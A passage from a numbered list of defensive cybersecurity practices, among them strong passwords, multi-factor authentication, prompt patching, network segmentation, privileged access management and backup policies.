  2. Using strong passwords that are resistant to brute-force attacks
  3. Using multi-factor authentication to prevent the use of stolen credentials
  4. Patching and updating systems promptly
  5. Limiting access to resources over the network
  6. Using network segmentation and traversal monitoring
  7. Using admin disabling tools to support identity and privileged access management
  8. Implementing and enforcing backup and restoration policies and procedures